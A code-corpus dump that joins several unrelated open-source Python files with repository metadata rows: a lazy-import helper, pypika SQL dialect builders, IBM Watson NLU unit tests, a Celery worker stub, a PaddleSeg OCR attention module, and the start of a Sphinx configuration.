# Source inspiration and lazyimports.py taken from nitime
from sequana.lazyimports import LazyImport
# lazy imports
pylab = LazyImport('pylab')
numpy = LazyImport('numpy')
scipy = LazyImport('scipy')
scipy_stats = LazyImport('scipy.stats')
pandas = LazyImport('pandas')
vcf = LazyImport("vcf")
def enabled():
"Returns ``True`` if LazyImports are globally enabled"
import sequana.lazyimports as l
return not l.disable_lazy_imports
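# Usage sketch: attribute access on a LazyImport triggers the real import, e.g.
#   from sequana.lazy import pandas
#   df = pandas.DataFrame()  # 'pandas' is only imported at this first access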
| 28.212121 | 78 | 0.672395 |
4a18ad035a04d802051beee555808a33049844a1 | 21,239 | py | Python | pypika/dialects.py | foggel/pypika | 1f6ab34bada982fe632e5828f87bfbac2e601c5f | ["Apache-2.0"] | stars: null | issues: null | forks: null |
from copy import copy
from typing import Any, Union, Optional
from pypika.enums import Dialects
from pypika.queries import (
CreateQueryBuilder,
Query,
QueryBuilder,
Table,
)
from pypika.terms import (
ArithmeticExpression,
EmptyCriterion,
Field,
Function,
Star,
Term,
ValueWrapper,
Criterion,
)
from pypika.utils import (
QueryException,
builder,
)
class SnowFlakeQueryBuilder(QueryBuilder):
QUOTE_CHAR = None
ALIAS_QUOTE_CHAR = '"'
def __init__(self, **kwargs: Any) -> None:
super().__init__(
dialect=Dialects.SNOWFLAKE, **kwargs
)
class SnowflakeQuery(Query):
"""
Defines a query class for use with Snowflake.
"""
@classmethod
def _builder(cls, **kwargs: Any) -> SnowFlakeQueryBuilder:
return SnowFlakeQueryBuilder(**kwargs)
class MySQLQueryBuilder(QueryBuilder):
QUOTE_CHAR = "`"
def __init__(self, **kwargs: Any) -> None:
super().__init__(
dialect=Dialects.MYSQL, wrap_set_operation_queries=False, **kwargs
)
self._duplicate_updates = []
self._ignore_duplicates = False
self._modifiers = []
def __copy__(self) -> "MySQLQueryBuilder":
newone = super().__copy__()
newone._duplicate_updates = copy(self._duplicate_updates)
newone._ignore_duplicates = copy(self._ignore_duplicates)
return newone
@builder
def on_duplicate_key_update(self, field: Union[Field, str], value: Any) -> "MySQLQueryBuilder":
if self._ignore_duplicates:
raise QueryException("Can not have two conflict handlers")
field = Field(field) if not isinstance(field, Field) else field
self._duplicate_updates.append((field, ValueWrapper(value)))
@builder
def on_duplicate_key_ignore(self) -> "MySQLQueryBuilder":
if self._duplicate_updates:
raise QueryException("Can not have two conflict handlers")
self._ignore_duplicates = True
def get_sql(self, **kwargs: Any) -> str:
self._set_kwargs_defaults(kwargs)
querystring = super(MySQLQueryBuilder, self).get_sql(**kwargs)
if querystring:
if self._duplicate_updates:
querystring += self._on_duplicate_key_update_sql(**kwargs)
elif self._ignore_duplicates:
querystring += self._on_duplicate_key_ignore_sql()
return querystring
def _on_duplicate_key_update_sql(self, **kwargs: Any) -> str:
return " ON DUPLICATE KEY UPDATE {updates}".format(
updates=",".join(
"{field}={value}".format(
field=field.get_sql(**kwargs), value=value.get_sql(**kwargs)
)
for field, value in self._duplicate_updates
)
)
def _on_duplicate_key_ignore_sql(self) -> str:
return " ON DUPLICATE KEY IGNORE"
@builder
def modifier(self, value: str) -> "MySQLQueryBuilder":
"""
Adds a modifier such as SQL_CALC_FOUND_ROWS to the query.
https://dev.mysql.com/doc/refman/5.7/en/select.html
:param value: The modifier value e.g. SQL_CALC_FOUND_ROWS
"""
self._modifiers.append(value)
def _select_sql(self, **kwargs: Any) -> str:
"""
Overridden function to generate the SELECT part of the SQL statement,
with the addition of the a modifier if present.
"""
return "SELECT {distinct}{modifier}{select}".format(
distinct="DISTINCT " if self._distinct else "",
modifier="{} ".format(" ".join(self._modifiers)) if self._modifiers else "",
select=",".join(
term.get_sql(with_alias=True, subquery=True, **kwargs)
for term in self._selects
),
)
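# Usage sketch for the upsert handlers above, with a hypothetical
# Table('customers'); the output shape is inferred from
# _on_duplicate_key_update_sql and is not verified against a server:
#   q = MySQLQuery.into(customers).insert(1, "a").on_duplicate_key_update(customers.name, "b")
#   str(q)  # INSERT INTO `customers` VALUES (1,'a') ON DUPLICATE KEY UPDATE `name`='b'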
class MySQLLoadQueryBuilder:
def __init__(self) -> None:
self._load_file = None
self._into_table = None
@builder
    def load(self, fp: str) -> "MySQLLoadQueryBuilder":
self._load_file = fp
@builder
    def into(self, table: Union[str, Table]) -> "MySQLLoadQueryBuilder":
self._into_table = table if isinstance(table, Table) else Table(table)
def get_sql(self, *args: Any, **kwargs: Any) -> str:
querystring = ""
if self._load_file and self._into_table:
querystring += self._load_file_sql(**kwargs)
querystring += self._into_table_sql(**kwargs)
querystring += self._options_sql(**kwargs)
return querystring
def _load_file_sql(self, **kwargs: Any) -> str:
return "LOAD DATA LOCAL INFILE '{}'".format(self._load_file)
def _into_table_sql(self, **kwargs: Any) -> str:
return " INTO TABLE `{}`".format(self._into_table.get_sql(**kwargs))
def _options_sql(self, **kwargs: Any) -> str:
return " FIELDS TERMINATED BY ','"
def __str__(self) -> str:
return self.get_sql()
class MySQLQuery(Query):
"""
Defines a query class for use with MySQL.
"""
@classmethod
def _builder(cls, **kwargs: Any) -> "MySQLQueryBuilder":
return MySQLQueryBuilder(**kwargs)
@classmethod
def load(cls, fp: str) -> "MySQLQueryBuilder":
return MySQLLoadQueryBuilder().load(fp)
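# Usage sketch, composed from the three SQL fragments in MySQLLoadQueryBuilder
# (the path is hypothetical):
#   str(MySQLQuery.load('/path/to/file.csv').into('abc'))
#   # LOAD DATA LOCAL INFILE '/path/to/file.csv' INTO TABLE `abc` FIELDS TERMINATED BY ','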
class VerticaQueryBuilder(QueryBuilder):
def __init__(self, **kwargs: Any) -> None:
super().__init__(dialect=Dialects.VERTICA, **kwargs)
self._hint = None
@builder
def hint(self, label: str) -> "VerticaQueryBuilder":
self._hint = label
def get_sql(self, *args: Any, **kwargs: Any) -> str:
sql = super().get_sql(*args, **kwargs)
if self._hint is not None:
sql = "".join(
[sql[:7], "/*+label({hint})*/".format(hint=self._hint), sql[6:]]
)
return sql
class VerticaCreateQueryBuilder(CreateQueryBuilder):
def __init__(self) -> None:
super().__init__(dialect=Dialects.VERTICA)
self._local = False
self._preserve_rows = False
@builder
def local(self) -> "VerticaCreateQueryBuilder":
if not self._temporary:
raise AttributeError("'Query' object has no attribute temporary")
self._local = True
@builder
def preserve_rows(self) -> "VerticaCreateQueryBuilder":
if not self._temporary:
raise AttributeError("'Query' object has no attribute temporary")
self._preserve_rows = True
def _create_table_sql(self, **kwargs: Any) -> str:
return "CREATE {local}{temporary}TABLE {table}".format(
local="LOCAL " if self._local else "",
temporary="TEMPORARY " if self._temporary else "",
table=self._create_table.get_sql(**kwargs),
)
def _columns_sql(self, **kwargs: Any) -> str:
return " ({columns}){preserve_rows}".format(
columns=",".join(column.get_sql(**kwargs) for column in self._columns),
preserve_rows=self._preserve_rows_sql(),
)
def _as_select_sql(self, **kwargs: Any) -> str:
return "{preserve_rows} AS ({query})".format(
preserve_rows=self._preserve_rows_sql(),
query=self._as_select.get_sql(**kwargs),
)
def _preserve_rows_sql(self) -> str:
return " ON COMMIT PRESERVE ROWS" if self._preserve_rows else ""
class VerticaCopyQueryBuilder:
def __init__(self) -> None:
self._copy_table = None
self._from_file = None
@builder
def from_file(self, fp: str) -> "VerticaCopyQueryBuilder":
self._from_file = fp
@builder
def copy_(self, table: Union[str, Table]) -> "VerticaCopyQueryBuilder":
self._copy_table = table if isinstance(table, Table) else Table(table)
def get_sql(self, *args: Any, **kwargs: Any) -> str:
querystring = ""
if self._copy_table and self._from_file:
querystring += self._copy_table_sql(**kwargs)
querystring += self._from_file_sql(**kwargs)
querystring += self._options_sql(**kwargs)
return querystring
def _copy_table_sql(self, **kwargs: Any) -> str:
return 'COPY "{}"'.format(self._copy_table.get_sql(**kwargs))
def _from_file_sql(self, **kwargs: Any) -> str:
return " FROM LOCAL '{}'".format(self._from_file)
def _options_sql(self, **kwargs: Any) -> str:
return " PARSER fcsvparser(header=false)"
def __str__(self) -> str:
return self.get_sql()
class VerticaQuery(Query):
"""
Defines a query class for use with Vertica.
"""
@classmethod
def _builder(cls, **kwargs) -> VerticaQueryBuilder:
return VerticaQueryBuilder(**kwargs)
@classmethod
def from_file(cls, fp: str) -> VerticaCopyQueryBuilder:
return VerticaCopyQueryBuilder().from_file(fp)
@classmethod
def create_table(cls, table: Union[str, Table]) -> VerticaCreateQueryBuilder:
return VerticaCreateQueryBuilder().create_table(table)
class OracleQueryBuilder(QueryBuilder):
def __init__(self, **kwargs: Any) -> None:
super().__init__(dialect=Dialects.ORACLE, **kwargs)
def get_sql(self, *args: Any, **kwargs: Any) -> str:
return super().get_sql(
*args, groupby_alias=False, **kwargs
)
class OracleQuery(Query):
"""
Defines a query class for use with Oracle.
"""
@classmethod
def _builder(cls, **kwargs: Any) -> OracleQueryBuilder:
return OracleQueryBuilder(**kwargs)
class PostgreQueryBuilder(QueryBuilder):
ALIAS_QUOTE_CHAR = '"'
def __init__(self, **kwargs: str) -> None:
super().__init__(dialect=Dialects.POSTGRESQL, **kwargs)
self._returns = []
self._return_star = False
self._on_conflict = False
self._on_conflict_fields = []
self._on_conflict_do_nothing = False
self._on_conflict_do_updates = []
self._on_conflict_wheres = None
self._on_conflict_do_update_wheres = None
self._distinct_on = []
def __copy__(self) -> "PostgreQueryBuilder":
newone = super().__copy__()
newone._returns = copy(self._returns)
newone._on_conflict_do_updates = copy(self._on_conflict_do_updates)
return newone
@builder
def distinct_on(self, *fields: Union[str, Term]) -> "PostgreQueryBuilder":
for field in fields:
if isinstance(field, str):
self._distinct_on.append(Field(field))
elif isinstance(field, Term):
self._distinct_on.append(field)
@builder
def on_conflict(self, *target_fields: Union[str, Term]) -> "PostgreQueryBuilder":
if not self._insert_table:
raise QueryException("On conflict only applies to insert query")
self._on_conflict = True
for target_field in target_fields:
if isinstance(target_field, str):
self._on_conflict_fields.append(self._conflict_field_str(target_field))
elif isinstance(target_field, Term):
self._on_conflict_fields.append(target_field)
@builder
def do_nothing(self) -> "PostgreQueryBuilder":
if len(self._on_conflict_do_updates) > 0:
raise QueryException("Can not have two conflict handlers")
self._on_conflict_do_nothing = True
@builder
def do_update(self, update_field: Union[str, Field], update_value: Any) -> "PostgreQueryBuilder":
if self._on_conflict_do_nothing:
raise QueryException("Can not have two conflict handlers")
if isinstance(update_field, str):
field = self._conflict_field_str(update_field)
elif isinstance(update_field, Field):
field = update_field
else:
raise QueryException("Unsupported update_field")
self._on_conflict_do_updates.append((field, ValueWrapper(update_value)))
@builder
def where(self, criterion: Criterion) -> "PostgreQueryBuilder":
if not self._on_conflict:
return super().where(criterion)
if isinstance(criterion, EmptyCriterion):
return
if self._on_conflict_do_nothing:
            raise QueryException('DO NOTHING does not support WHERE')
if self._on_conflict_fields and self._on_conflict_do_updates:
if self._on_conflict_do_update_wheres:
self._on_conflict_do_update_wheres &= criterion
else:
self._on_conflict_do_update_wheres = criterion
elif self._on_conflict_fields:
if self._on_conflict_wheres:
self._on_conflict_wheres &= criterion
else:
self._on_conflict_wheres = criterion
else:
raise QueryException('Can not have fieldless ON CONFLICT WHERE')
def _distinct_sql(self, **kwargs: Any) -> str:
if self._distinct_on:
return "DISTINCT ON({distinct_on}) ".format(
distinct_on=",".join(
term.get_sql(with_alias=True, **kwargs) for term in self._distinct_on
)
)
return super()._distinct_sql(**kwargs)
def _conflict_field_str(self, term: str) -> Optional[Field]:
if self._insert_table:
return Field(term, table=self._insert_table)
def _on_conflict_sql(self, **kwargs: Any) -> str:
if not self._on_conflict_do_nothing and len(self._on_conflict_do_updates) == 0:
if not self._on_conflict_fields:
return ""
raise QueryException("No handler defined for on conflict")
if self._on_conflict_do_updates and not self._on_conflict_fields:
raise QueryException("Can not have fieldless on conflict do update")
conflict_query = " ON CONFLICT"
if self._on_conflict_fields:
fields = [f.get_sql(with_alias=True, **kwargs)
for f in self._on_conflict_fields]
conflict_query += " (" + ', '.join(fields) + ")"
if self._on_conflict_wheres:
conflict_query += " WHERE {where}".format(
where=self._on_conflict_wheres.get_sql(subquery=True, **kwargs)
)
return conflict_query
def _on_conflict_action_sql(self, **kwargs: Any) -> str:
if self._on_conflict_do_nothing:
return " DO NOTHING"
elif len(self._on_conflict_do_updates) > 0:
action_sql = " DO UPDATE SET {updates}".format(
updates=",".join(
"{field}={value}".format(
field=field.get_sql(**kwargs),
value=value.get_sql(with_namespace=True, **kwargs),
)
for field, value in self._on_conflict_do_updates
)
)
if self._on_conflict_do_update_wheres:
action_sql += " WHERE {where}".format(
where=self._on_conflict_do_update_wheres.get_sql(subquery=True, with_namespace=True, **kwargs)
)
return action_sql
return ''
@builder
def returning(self, *terms: Any) -> "PostgreQueryBuilder":
for term in terms:
if isinstance(term, Field):
self._return_field(term)
elif isinstance(term, str):
self._return_field_str(term)
elif isinstance(term, ArithmeticExpression):
self._return_other(term)
elif isinstance(term, Function):
raise QueryException("Aggregate functions are not allowed in returning")
else:
self._return_other(self.wrap_constant(term, self._wrapper_cls))
def _validate_returning_term(self, term: Term) -> None:
for field in term.fields_():
if not any([self._insert_table, self._update_table, self._delete_from]):
raise QueryException("Returning can't be used in this query")
if (
field.table not in {self._insert_table, self._update_table}
and term not in self._from
):
raise QueryException("You can't return from other tables")
def _set_returns_for_star(self) -> None:
self._returns = [
returning for returning in self._returns if not hasattr(returning, "table")
]
self._return_star = True
def _return_field(self, term: Union[str, Field]) -> None:
if self._return_star:
# Do not add select terms after a star is selected
return
self._validate_returning_term(term)
if isinstance(term, Star):
self._set_returns_for_star()
self._returns.append(term)
def _return_field_str(self, term: Union[str, Field]) -> None:
if term == "*":
self._set_returns_for_star()
self._returns.append(Star())
return
if self._insert_table:
self._return_field(Field(term, table=self._insert_table))
elif self._update_table:
self._return_field(Field(term, table=self._update_table))
elif self._delete_from:
self._return_field(Field(term, table=self._from[0]))
else:
raise QueryException("Returning can't be used in this query")
def _return_other(self, function: Term) -> None:
self._validate_returning_term(function)
self._returns.append(function)
def _returning_sql(self, **kwargs: Any) -> str:
return " RETURNING {returning}".format(
returning=",".join(
term.get_sql(with_alias=True, **kwargs) for term in self._returns
),
)
def get_sql(self, with_alias: bool = False, subquery: bool = False, **kwargs: Any) -> str:
self._set_kwargs_defaults(kwargs)
querystring = super(PostgreQueryBuilder, self).get_sql(
with_alias, subquery, **kwargs
)
with_namespace = False
        if self._update_table and self._from:
with_namespace = True
querystring += self._on_conflict_sql(**kwargs)
querystring += self._on_conflict_action_sql(**kwargs)
if self._returns:
querystring += self._returning_sql(with_namespace=with_namespace, **kwargs)
return querystring
class PostgreSQLQuery(Query):
"""
Defines a query class for use with PostgreSQL.
"""
@classmethod
def _builder(cls, **kwargs) -> PostgreQueryBuilder:
return PostgreQueryBuilder(**kwargs)
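# Usage sketch for the conflict handlers above, with a hypothetical table t;
# the shape is inferred from _on_conflict_sql/_on_conflict_action_sql and is
# not verified output:
#   q = PostgreSQLQuery.into(t).insert(1, "m").on_conflict(t.id).do_update(t.name, "m")
#   # INSERT INTO "t" VALUES (1,'m') ON CONFLICT ("id") DO UPDATE SET "name"='m'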
class RedshiftQuery(Query):
"""
Defines a query class for use with Amazon Redshift.
"""
@classmethod
def _builder(cls, **kwargs: Any) -> "QueryBuilder":
return QueryBuilder(dialect=Dialects.REDSHIFT, **kwargs)
class MSSQLQueryBuilder(QueryBuilder):
def __init__(self, **kwargs: Any) -> None:
super().__init__(dialect=Dialects.MSSQL, **kwargs)
self._top = None
@builder
def top(self, value: Union[str, int]) -> "MSSQLQueryBuilder":
"""
Implements support for simple TOP clauses.
Does not include support for PERCENT or WITH TIES.
https://docs.microsoft.com/en-us/sql/t-sql/queries/top-transact-sql?view=sql-server-2017
"""
try:
self._top = int(value)
except ValueError:
raise QueryException("TOP value must be an integer")
def get_sql(self, *args: Any, **kwargs: Any) -> str:
return super().get_sql(
*args, groupby_alias=False, **kwargs
)
def _top_sql(self) -> str:
if self._top:
return "TOP ({}) ".format(self._top)
else:
return ""
def _select_sql(self, **kwargs: Any) -> str:
return "SELECT {distinct}{top}{select}".format(
top=self._top_sql(),
distinct="DISTINCT " if self._distinct else "",
select=",".join(
term.get_sql(with_alias=True, subquery=True, **kwargs)
for term in self._selects
),
)
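# Usage sketch: .top(10) injects "TOP (10) " right after SELECT, e.g.
#   MSSQLQuery.from_("t").select("*").top(10)  # SELECT TOP (10) * FROM "t"
# (quoting per the builder defaults; a sketch, not verified output).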
class MSSQLQuery(Query):
"""
Defines a query class for use with Microsoft SQL Server.
"""
@classmethod
def _builder(cls, **kwargs: Any) -> MSSQLQueryBuilder:
return MSSQLQueryBuilder(**kwargs)
class ClickHouseQuery(Query):
"""
Defines a query class for use with Yandex ClickHouse.
"""
@classmethod
def _builder(cls, **kwargs: Any) -> QueryBuilder:
return QueryBuilder(dialect=Dialects.CLICKHOUSE, wrap_set_operation_queries=False, as_keyword=True, **kwargs)
class SQLLiteValueWrapper(ValueWrapper):
def get_value_sql(self, *args: Any, **kwargs: Any) -> str:
if isinstance(self.value, bool):
return "1" if self.value else "0"
return super().get_value_sql(*args, **kwargs)
class SQLLiteQuery(Query):
"""
Defines a query class for use with Microsoft SQL Server.
"""
@classmethod
def _builder(cls, **kwargs: Any) -> QueryBuilder:
return QueryBuilder(
dialect=Dialects.SQLLITE, wrapper_cls=SQLLiteValueWrapper, **kwargs
)
| 33.185938 | 117 | 0.615801 |
4a18ad0a477eaff536213311e1c0d91ab11c4ca3 | 6,671 | py | Python | test/unit/test_natural_language_understanding.py | avilaroman/python-sdk | 5f2dad0c91fa29d188c00f686993c4ab2243fdcd | ["Apache-2.0"] | stars: 1 (2019-06-29T19:32:38.000Z .. 2019-06-29T19:32:38.000Z) | issues: null | forks: 1 (2019-11-26T03:04:12.000Z .. 2019-11-26T03:04:12.000Z) |
# coding: utf-8
from unittest import TestCase
from ibm_watson import NaturalLanguageUnderstandingV1
from ibm_watson.natural_language_understanding_v1 import \
Features, ConceptsOptions, EntitiesOptions, KeywordsOptions, CategoriesOptions, \
EmotionOptions, MetadataOptions, SemanticRolesOptions, RelationsOptions, \
SentimentOptions
import os
import pytest
import responses
base_url = 'https://gateway.watsonplatform.net'
default_url = '{0}/natural-language-understanding/api'.format(base_url)
class TestFeatures(TestCase):
def test_concepts(self):
c = Features(concepts=ConceptsOptions())
assert c._to_dict() == {'concepts': {}}
c = Features(concepts=ConceptsOptions(limit=10))
assert c._to_dict() == {'concepts': {'limit': 10}}
def test_entities(self):
e = Features(entities=EntitiesOptions())
assert e._to_dict() == {'entities': {}}
def test_keywords(self):
k = Features(keywords=KeywordsOptions())
assert k._to_dict() == {'keywords': {}}
def test_categories(self):
c = Features(categories=CategoriesOptions())
assert c._to_dict() == {'categories': {}}
def test_emotion(self):
e = Features(emotion=EmotionOptions())
assert e._to_dict() == {'emotion': {}}
def test_metadata(self):
m = Features(metadata=MetadataOptions())
assert m._to_dict() == {'metadata': {}}
def test_semantic_roles(self):
s = Features(semantic_roles=SemanticRolesOptions())
assert s._to_dict() == {'semantic_roles': {}}
def test_relations(self):
r = Features(relations=RelationsOptions())
assert r._to_dict() == {'relations': {}}
def test_sentiment(self):
s = Features(sentiment=SentimentOptions())
assert s._to_dict() == {'sentiment': {}}
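    # The cases above suggest that multiple options merge into a single dict,
    # e.g. Features(concepts=ConceptsOptions(limit=5), sentiment=SentimentOptions())
    # would be expected to serialize to {'concepts': {'limit': 5}, 'sentiment': {}}
    # (a sketch inferred from the tested pattern, not an additional assertion).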
class TestNaturalLanguageUnderstanding(TestCase):
def test_version_date(self):
with pytest.raises(TypeError):
NaturalLanguageUnderstandingV1() # pylint: disable=E1120
nlu = NaturalLanguageUnderstandingV1(version='2016-01-23',
url='http://bogus.com',
username='username',
password='password')
assert nlu
@pytest.mark.skipif(os.getenv('VCAP_SERVICES') is not None,
reason='credentials may come from VCAP_SERVICES')
def test_missing_credentials(self):
with pytest.raises(ValueError):
NaturalLanguageUnderstandingV1(version='2016-01-23')
with pytest.raises(ValueError):
NaturalLanguageUnderstandingV1(version='2016-01-23',
url='https://bogus.com')
def test_analyze_throws(self):
nlu = NaturalLanguageUnderstandingV1(version='2016-01-23',
url='http://bogus.com',
username='username',
password='password')
with pytest.raises(ValueError):
nlu.analyze(None, text="this will not work")
@responses.activate
def test_text_analyze(self):
nlu_url = "http://bogus.com/v1/analyze"
responses.add(responses.POST, nlu_url,
body="{\"resulting_key\": true}", status=200,
content_type='application/json')
nlu = NaturalLanguageUnderstandingV1(version='2016-01-23',
url='http://bogus.com',
username='username',
password='password')
nlu.analyze(Features(sentiment=SentimentOptions()), text="hello this is a test")
assert len(responses.calls) == 1
@responses.activate
def test_html_analyze(self):
nlu_url = "http://bogus.com/v1/analyze"
responses.add(responses.POST, nlu_url,
body="{\"resulting_key\": true}", status=200,
content_type='application/json')
nlu = NaturalLanguageUnderstandingV1(version='2016-01-23',
url='http://bogus.com',
username='username',
password='password')
nlu.analyze(Features(sentiment=SentimentOptions(),
emotion=EmotionOptions(document=False)),
html="<span>hello this is a test</span>")
assert len(responses.calls) == 1
@responses.activate
def test_url_analyze(self):
nlu_url = "http://bogus.com/v1/analyze"
responses.add(responses.POST, nlu_url,
body="{\"resulting_key\": true}", status=200,
content_type='application/json')
nlu = NaturalLanguageUnderstandingV1(version='2016-01-23',
url='http://bogus.com',
username='username',
password='password')
nlu.analyze(Features(sentiment=SentimentOptions(),
emotion=EmotionOptions(document=False)),
url="http://cnn.com",
xpath="/bogus/xpath", language="en")
assert len(responses.calls) == 1
@responses.activate
def test_list_models(self):
nlu_url = "http://bogus.com/v1/models"
responses.add(responses.GET, nlu_url, status=200,
body="{\"resulting_key\": true}",
content_type='application/json')
nlu = NaturalLanguageUnderstandingV1(version='2016-01-23',
url='http://bogus.com',
username='username',
password='password')
nlu.list_models()
assert len(responses.calls) == 1
@responses.activate
def test_delete_model(self):
model_id = "invalid_model_id"
nlu_url = "http://bogus.com/v1/models/" + model_id
responses.add(responses.DELETE, nlu_url, status=200,
body="{}", content_type='application/json')
nlu = NaturalLanguageUnderstandingV1(version='2016-01-23',
url='http://bogus.com',
username='username',
password='password')
nlu.delete_model(model_id)
assert len(responses.calls) == 1
| 43.318182 | 88 | 0.545945 |
4a18ae2e87d1a41ecee31c3bee66f57729d4b62d | 448 | py | Python | bdc_collection_builder/celery/worker.py | brazil-data-cube/bdc-collection-builder | 765213341a30555d9ff2eab553ea659e278a69b5 | ["MIT"] | stars: 2 (2020-02-06T13:52:30.000Z .. 2020-09-14T15:05:39.000Z) | issues: 94 (2020-02-03T19:34:14.000Z .. 2022-03-25T18:28:40.000Z) | forks: 6 (2020-02-04T17:21:21.000Z .. 2020-10-07T13:02:39.000Z) |
#
# This file is part of Brazil Data Cube Collection Builder.
# Copyright (C) 2019-2020 INPE.
#
# Brazil Data Cube Collection Builder is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
#
"""Defines a structure component to run celery worker."""
# Builder
from .. import create_app
from . import create_celery_app
app = create_app()
celery = create_celery_app(app)
| 26.352941 | 96 | 0.756696 |
4a18ae9058af5e714ffdea73c980d3aa565aab1d | 5,441 | py | Python | EISeg/eiseg/model/modeling/ocr.py | JamesLim-sy/PaddleSeg | f8cfb80f543a52599d1588026e71f069b702b781 | ["Apache-2.0"] | stars: 4,708 (2019-08-26T13:54:39.000Z .. 2022-03-31T16:01:53.000Z) | issues: 1,083 (2019-09-12T02:57:24.000Z .. 2022-03-31T13:30:30.000Z) | forks: 1,046 (2019-08-26T22:05:01.000Z .. 2022-03-30T14:09:28.000Z) |
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
class SpatialGather_Module(nn.Layer):
"""
Aggregate the context features according to the initial
predicted probability distribution.
Employ the soft-weighted method to aggregate the context.
"""
def __init__(self, cls_num=0, scale=1):
super(SpatialGather_Module, self).__init__()
self.cls_num = cls_num
self.scale = scale
def forward(self, feats, probs):
b, c, h, w = probs.shape
probs = probs.reshape([b, c, -1])
feats = feats.reshape([b, feats.shape[1], -1])
feats = feats.transpose([0, 2, 1])
probs = F.softmax(self.scale * probs, axis=2)
ocr_context = paddle.unsqueeze(paddle.matmul(probs, feats).transpose([0, 2, 1]), 3)
return ocr_context
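# Shape sketch for SpatialGather_Module.forward: probs [b, K, h*w] (softmaxed
# over pixels) @ feats [b, h*w, C] -> per-class context [b, K, C], returned as
# [b, C, K, 1] so each of the K class regions carries a C-dim representation.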
class SpatialOCR_Module(nn.Layer):
"""
Implementation of the OCR module:
We aggregate the global object representation to update the representation for each pixel.
"""
def __init__(self,
in_channels,
key_channels,
out_channels,
scale=1,
dropout=0.1,
norm_layer=nn.BatchNorm2D,
align_corners=True,
):
super(SpatialOCR_Module, self).__init__()
self.object_context_block = ObjectAttentionBlock2D(in_channels, key_channels, scale,
norm_layer, align_corners)
_in_channels = 2 * in_channels
self.conv_bn_dropout = nn.Sequential(
nn.Conv2D(_in_channels, out_channels, kernel_size=1, padding=0, bias_attr=False),
nn.Sequential(norm_layer(out_channels), nn.ReLU()),
nn.Dropout2D(dropout)
)
def forward(self, feats, proxy_feats):
context = self.object_context_block(feats, proxy_feats)
output = self.conv_bn_dropout(paddle.concat([context, feats], 1))
return output
class ObjectAttentionBlock2D(nn.Layer):
'''
The basic implementation for object context block
Input:
N X C X H X W
Parameters:
in_channels : the dimension of the input feature map
key_channels : the dimension after the key/query transform
scale : choose the scale to downsample the input feature maps (save memory cost)
bn_type : specify the bn type
Return:
N X C X H X W
'''
def __init__(self,
in_channels,
key_channels,
scale=1,
norm_layer=nn.BatchNorm2D,
align_corners=True):
super(ObjectAttentionBlock2D, self).__init__()
self.scale = scale
self.in_channels = in_channels
self.key_channels = key_channels
self.align_corners = align_corners
self.pool = nn.MaxPool2D(kernel_size=(scale, scale))
self.f_pixel = nn.Sequential(
nn.Conv2D(in_channels=self.in_channels, out_channels=self.key_channels,
                      kernel_size=1, stride=1, padding=0, bias_attr=False),
nn.Sequential(norm_layer(self.key_channels), nn.ReLU()),
nn.Conv2D(in_channels=self.key_channels, out_channels=self.key_channels,
kernel_size=1, stride=1, padding=0, bias_attr=False),
nn.Sequential(norm_layer(self.key_channels), nn.ReLU())
)
self.f_object = nn.Sequential(
nn.Conv2D(in_channels=self.in_channels, out_channels=self.key_channels,
kernel_size=1, stride=1, padding=0, bias_attr=False),
nn.Sequential(norm_layer(self.key_channels), nn.ReLU()),
nn.Conv2D(in_channels=self.key_channels, out_channels=self.key_channels,
kernel_size=1, stride=1, padding=0, bias_attr=False),
nn.Sequential(norm_layer(self.key_channels), nn.ReLU())
)
self.f_down = nn.Sequential(
nn.Conv2D(in_channels=self.in_channels, out_channels=self.key_channels,
kernel_size=1, stride=1, padding=0, bias_attr=False),
nn.Sequential(norm_layer(self.key_channels), nn.ReLU())
)
self.f_up = nn.Sequential(
nn.Conv2D(in_channels=self.key_channels, out_channels=self.in_channels,
kernel_size=1, stride=1, padding=0, bias_attr=False),
nn.Sequential(norm_layer(self.in_channels), nn.ReLU())
)
def forward(self, x, proxy):
b, c, h, w = x.shape
if self.scale > 1:
x = self.pool(x)
query = self.f_pixel(x).reshape([b, self.key_channels, -1])
query = query.transpose([0, 2, 1])
key = self.f_object(proxy).reshape([b, self.key_channels, -1])
value = self.f_down(proxy).reshape([b, self.key_channels, -1])
value = value.transpose([0, 2, 1])
sim_map = paddle.matmul(query, key)
sim_map = (self.key_channels ** -.5) * sim_map
sim_map = F.softmax(sim_map, axis=-1)
context = paddle.matmul(sim_map, value)
context = context.transpose([0, 2, 1])
context = context.reshape([b, self.key_channels, h, w])
context = self.f_up(context)
if self.scale > 1:
context = F.interpolate(context, size=[h, w], mode='bilinear', align_corners=self.align_corners)
return context
| 39.715328 | 108 | 0.602463 |
4a18aeec7caaeb51a24ff7779c6a989f560ccc49 | 235 | py | Python | pydocx/test/__init__.py | head: 98c6aa626d875278240eabea8f86a914840499b3 | ["Apache-2.0"] | stars: 127 on botzill/pydocx (2015-01-12T22:35:34.000Z .. 2022-01-20T06:24:18.000Z) | issues: 156 on turbo-q/pydocx (2015-01-05T19:55:56.000Z .. 2020-10-14T07:01:42.000Z) | forks: 45 on turbo-q/pydocx (2015-02-22T18:52:08.000Z .. 2021-06-14T08:05:47.000Z) |
from pydocx.test.testcases import (
DocumentGeneratorTestCase,
DocXFixtureTestCaseFactory,
TranslationTestCase,
)
__all__ = [
'DocumentGeneratorTestCase',
'DocXFixtureTestCaseFactory',
'TranslationTestCase',
]
| 19.583333 | 35 | 0.748936 |
4a18afb6265e2a536665f0282971d1175a616a36 | 3,267 | py | Python | docs/conf.py | zama-ai/concrete-numpy | ca60d646f26bc26c4c398aeb2bb89c572b3e6d63 | ["FTL"] | stars: 96 (2022-01-12T15:07:50.000Z .. 2022-03-16T04:00:09.000Z) | issues: 10 (2022-02-04T16:26:37.000Z .. 2022-03-25T14:08:01.000Z) | forks: 8 (2022-01-12T15:07:55.000Z .. 2022-03-05T00:46:16.000Z) |
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'Concrete Numpy'
copyright = '2021, Zama'
author = 'Zama'
description = 'Zama Concrete Numpy'
root_url = os.environ.get("DOC_ROOT_URL", "/concrete-numpy")
root_url = root_url if root_url.endswith('/') else root_url + '/'
# The full version, including alpha/beta/rc tags
release = "0.5.0"
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
